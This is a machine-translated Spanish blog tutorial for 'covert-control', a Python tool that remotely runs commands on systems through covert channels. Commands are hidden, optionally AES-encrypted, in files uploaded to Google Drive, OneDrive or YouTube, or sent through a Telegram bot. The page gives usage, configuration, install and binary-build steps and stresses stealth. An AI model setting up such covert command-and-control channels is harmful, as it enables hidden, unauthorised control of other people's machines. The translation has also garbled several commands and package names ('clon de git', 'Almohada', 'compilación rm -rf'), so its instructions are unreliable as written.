Tutoriales

Google Drive, OneDrive y Youtube como canales encubiertos

mayo 24, 2022
0 9 3 minutos de lectura
Google Drive, OneDrive y Youtube como canales encubiertos

Control encubierto sistemas de forma remota cargando archivos en Google Drive, OneDrive, Youtube o Telegram usando Python para crear los archivos y los oyentes. Permite crear archivos de texto, imágenes, audio o videos, con los comandos en texto claro o encriptados usando AES.

  • covert-googledrive.py: sistemas de control que cargan archivos en una carpeta pública en Google Drive.
  • covert-onedrive.py: sistemas de control que cargan archivos en una carpeta pública en OneDrive.
  • covert-youtube.py – Sistemas de control que suben videos a Youtube (actualizado desde covert-tube).
  • covert-telegram.py – Sistemas de control con un bot de Telegram.

Crear archivos para cargar

Puede encontrar archivos de ejemplo en la carpeta test_files o crear nuevos con generate_file.py:

python3 generar_archivo.py -t TIPO [-o OUTPUTFILE] [-c COMMAND] [-e]

  • -t (–tipo) [Required]: Tipos de archivo: “texto”, “imagen”, “audio” o “video”.
  • -o (–archivo de salida) [Optional]: Archivo de salida.
  • -c (–comando) [Optional]: Comando a ejecutar.
  • -e (–cifrado) [Optional]: agregue esta bandera para cifrar el comando con AES.

Ejemplos:

Publicaciones relacionadas

python3 generar_archivo.py -t texto -c «whoami» -o texto.txt
python3 generar_archivo.py -t texto -c «whoami» -o texto_encriptado.txt -e
python3 generar_archivo.py -t audio -c «whoami» -o audio.wav
python3 generar_archivo.py -t audio -c «whoami» -o audio_encrypted.wav -e
python3 generar_archivo.py -t imagen -c «whoami» -o imagen.png
python3 generar_archivo.py -t imagen -c «whoami» -o imagen_encriptada.png -e
python3 generar_archivo.py -t video -c «whoami» -o video.avi
python3 generar_archivo.py -t video -c «whoami» -o video_encrypted.avi -e

Configuración

Valores de configuración comunes:

  • tipo de datos (Opcional. Predeterminado: «texto»): tipo_de_datos Tipo de archivo Cifrado Válido para Extensión texto Archivo de texto No Google Drive, OneDrive.txttext_encrypted Archivo de texto Sí Google Drive, OneDrive. txtimage Imagen No Google Drive, OneDrive.pngimage_encrypted Imagen Sí Google Drive, OneDrive.pngaudioAudio No Google Drive, OneDrive. .avivideo_encryptedVideoSíGoogle Drive, OneDrive, Youtube.avi
  • retraso_segundos (Opcional. Predeterminado: 300): Segundos entre comprobaciones de nuevos archivos subidos a la carpeta de Google Drive o OneDrive o nuevos vídeos en el canal de Youtube.
  • clave_aes (Opcional. Predeterminado: “covert-control21”): Clave para el cifrado AES.
  • depurar (Opcional. Predeterminado: Verdadero): Imprime mensajes y marcas de tiempo en el oyente o no.

Valores de configuración específicos:

  • carpeta_de_unidad_de_google: Url de la carpeta pública de Google Drive para monitorear (para covert-googledrive.py).
  • carpeta_onedrive: Url de la carpeta pública de OneDrive para monitorear (para covert-onedrive.py).
  • youtube_channel_id: ID de canal de Youtube del canal a monitorear. Puede obtenerlo desde aquí (para covert-youtube.py).
  • youtube_api_clave: Obtenga una clave de API creando una aplicación y generando la clave aquí (para covert-youtube.py).
  • telegram_token: Token de Bot, créelo usando BotFather. Escriba «/newbot», luego envíe un nombre para el bot (por ejemplo, «botname») y un nombre de usuario para el bot que termine en «-bot» (por ejemplo, «somethingrandombot») (para covert-telegram.py).
  • telegram_username: especifique un nombre de usuario de Telegram para que solo ejecute los comandos recibidos de este usuario (sin «@»).

Google Drive

Permite ejecutar comandos cargando archivos de texto, imágenes, audio y videos, sin encriptar o encriptados con AES. El argumento de entrada opcional es la URL de la carpeta pública, que también se puede configurar en config.py:

python3 encubierto-googledrive.py [FOLDER_URL]

El oyente comprobará la carpeta de Google Drive cada 300 segundos de forma predeterminada (se puede actualizar en config.py). En este caso se sube un video, “video.avi”, con el comando en el QR del video:

Después de encontrar que hay un nuevo archivo cargado en la carpeta, se descarga, se procesa y se ejecutan los comandos:

Onedrive

Permite ejecutar comandos cargando archivos de texto, imágenes, audio y videos, sin encriptar o encriptados con AES. El argumento de entrada opcional es la URL de la carpeta pública, que también se puede configurar en config.py:

python3 encubierto-onedrive.py [FOLDER_URL]

El oyente comprobará la carpeta OneDrive cada 300 segundos de forma predeterminada (esto se puede actualizar en config.py). En este caso se sube un audio, “audio_encrypted.wav”, con el comando encriptado con AES:

Después de encontrar que hay un nuevo archivo cargado en la carpeta, se descarga, se procesa y se ejecutan los comandos:

NOTA: Esto solo funcionará si no eliminas ningún archivo de la carpeta, si lo haces deberás crear uno nuevo. Podría ser posible implementarlo para que funcione incluso después de eliminar archivos, pero sería necesario crear muchas solicitudes y sería menos sigiloso.

YouTube

Permite ejecutar comandos subiendo videos, sin encriptar o encriptados con AES. Los argumentos de entrada opcionales son el ID del canal de Youtube para monitorear y la clave API, que también se puede configurar en config.py:

python3 encubierto-youtube.py [CHANNEL_ID] [API_KEY]

El oyente revisará el canal de Youtube cada 300 segundos por defecto (esto se puede actualizar en config.py). Primero se sube el video:

Después de encontrar un nuevo video en el canal, se descarga, se procesa y se ejecutan los comandos:

Telegrama

Controle los sistemas de forma remota con un bot de Telegram. Esta opción no permite subir archivos, pero es posible enviar los comandos en texto claro (“/cmd”) o encriptados con AES (“/encrypted”). El primer argumento de entrada opcional es el token del bot, que también se puede configurar en config.py; el segundo se usa para configurar un solo usuario de Telegram que puede enviar comandos al bot (sin “@”):

python3 telegrama encubierto.py [BOT_TOKEN] [TELEGRAM_USER]

El oyente verificará los comandos en el chat y mostrará el resultado:

/cmd CLEARTEXTO_COMANDO
/AES_ENCRYPTED_COMMAND cifrado

Instalación

sudo apt install libzbar0
pip install bs4 Almohada opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot solicitudes argparse pycryptodome
clon de git https://github.com/ricardojoserf/covert-control && cd covert-control/

Crear binarios independientes

pyinstaller –onefile encubierto-googledrive.py
pyinstaller –onefile encubierto-onedrive.py
pyinstaller –onefile encubierto-telegram.py
pyinstaller –onefile encubierto-youtube.py
compilación rm -rf
rm *espec.
ls dist/

LEER  Cómo proteger con contraseña el directorio en el servidor web Nginx
Etiquetas
mayo 24, 2022
0 9 3 minutos de lectura

Publicaciones relacionadas

Diez canales de YouTube que los usuarios de Linux deberían explorar

Diez canales de YouTube que los usuarios de Linux deberían explorar

noviembre 15, 2023

Explotaciones para vulnerabilidades de ascensión de privilegios avíos

abril 12, 2021

Cómo comprobar las sumas de comprobación SHA1, SHA256 y MD5 en Windows para sistemas operativos Linux

mayo 29, 2021

Ulauncher: un lanzador de aplicaciones súper útil para Linux

agosto 23, 2021

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba